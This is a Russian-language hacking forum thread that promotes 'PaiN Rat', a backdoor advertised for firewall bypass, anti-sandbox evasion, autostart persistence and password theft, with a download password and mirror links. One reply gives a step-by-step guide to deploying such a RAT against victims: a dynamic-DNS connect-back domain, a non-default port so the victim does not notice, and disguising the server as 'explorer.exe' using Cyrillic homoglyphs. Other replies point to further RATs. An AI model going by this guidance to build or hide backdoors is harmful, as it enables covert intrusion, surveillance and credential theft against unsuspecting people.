PaiN Rat

[Winux]

PaiN Rat 0.1 Beta 9
Новый паблик-бэкдор.
Основные особенности:
----------
- Обход фаеров (DLL Injection, ДЛЛ не пишется на хард)
- Шифрование трафика
- 4 метода автозагрузки (Shell, Policies, ActiveX, UserInIt)
- Встроенный Binder
- Многопоточная передача
- Антиотладка (Anti VMware, VirtualPC, Anubis Sandbox..etc)

Кроме того огромная коллекция бэкдорных функций, отправка паролей.
Пока не совместима с вистой.

Release date: 2008-08-06

Пасс:

Спойлер: 10

HackTheDarkness.com

[New$paN]
Скриншот|Screenshot
Скачать|Download
:zns2: Домашняя страница программы

 

[jet92]

HackTheDarkness.com

пасс.

если винукс не хочет чтобы дауны юзали, просто удали мой пост.

 

[CannabiS]

Актуально......больше смахивает на фейк Poison Ivy ....но так же радует глаза новые функции.....особенно радует автозагрузка на флешку 8)
Подожду Full версию.....

 

[jet92]

CannabiS
можно ссылку на

Poison Ivy

гуглил его, не нашел.

буду благодарен.

 

[Mr.Di]

jet92

если винукс не хочет чтобы дауны юзали, просто удали мой пост.

Какого вы высого мнения о себе, товарищь

можно ссылку на Poison Ivy гуглил его, не нашел. буду благодарен.

http://www.google.ru/search?hl=ru&q=poisonivy самый первый линк

 

[jet92]

DiFor
что ты хочешь этим сказать ?

возможно не нашел потому что гугли по Poison Ivy

 

[DeaDMonaX]

jet92

если винукс не хочет чтобы дауны юзали, просто удали мой пост.

он про это :fie: keep 0day priv8

 

[Mr.Di]

Монах, я плакаю) :cry2:

 

[jet92]

еманарот, я вас не понимаю парни(((((

 

[parovoz]

кури больше...пака ты не дайдешь да састяния дзена ничего не сможешь понять... :yinyang:

 

[egor084]

у кого есть хелп?

 

[Fallen]

egor084
no-ip.com , там зарегестрироваться,зарегать домен (там же,бесплатно),поставить их клиент у себя на компе,домен который ты зарегал - будет твой IP.
Теперь билдим SynRat или еще что с аналогичной системой коннекта.
Порт - указываем свободный порт, желательно не по дефолту который там т.к жертва может спалить что у нее бекдор,зная что Synrat коннектится на этот порт и сразу поймет.Ставим порт другой.Незнаю,есть там автозагрузка,нету,по идее,должна быть.Ставишь автозагрузку,указываешь имя сервиса,потом указываешь где твой сервер будет храниться,можно в папке \WINDOWS\ с названием explorer.exe - где e руссий аналог e,х - русская х и тд,вот скопируй допустим название (без ковычек) "ехplоrеr.exe",так сложнее спалить.
И самое главное,указываешь в DNS или что там,HOST,свой домен который зарегал,открываешь No-ip смотришь чтоб он был активен,т.к там горела такая улыбающаяся рожица.
Сервер настроили.(незнаю какие там еще фичи есть,ставь галки на нужных опциях,если непонимаешь по англ -> translate.google.com).
Клиент - указываешь какой порт прослушивать (указать порт,который ты указал при создании сервера.) Если при создании сервера указывал пароль (что-бы хз кто похекав твой гейт не забрал твоих ботов),указываешь в клиенте пароль.Все,запускаешь бекдор - он коннектится к тебе.Вроде все понятно должно быть.

 

[CannabiS]

ЖЖЖош а если у жертвы нету русской раскладки
и будет у него этот файл в ероглифах ...вот не разу не подозрительно и без палева :huh1:

 

[astralmaster]

Ну для этого нужен Unicode троян. всеравно какая раскладка будет. Один такой Nuclear RAT.

вот ссылка: Nuclearwintercrew.com nuclearwintercrew.com

 

[kolllak]

автор обнови плз ссыль в первом посте...

 

[AHTOLLlKA]

ога ссылка мертвая в первом посте.. есть зеркала ?

Добавлено в [time]1237122543[/time]
вот тут можно его скачать но проверяйте на вшивоость

http://80.244.200.245/Ratforge%20downloads...r=%5C&recursive

 

[gangsta]

ещё актуален ?

 

[parovoz]

это не сплойты каторые с моды выходят...такие вещи астаюцца актуальными вечно...успевай толька критавать...я бывает даже хкантролам пользуюсь инакда=)0 :baby: :baby:

 

[DKV]

Не вещь прикольная я за

 

[gangsta]

пайсон хуже чтоль ?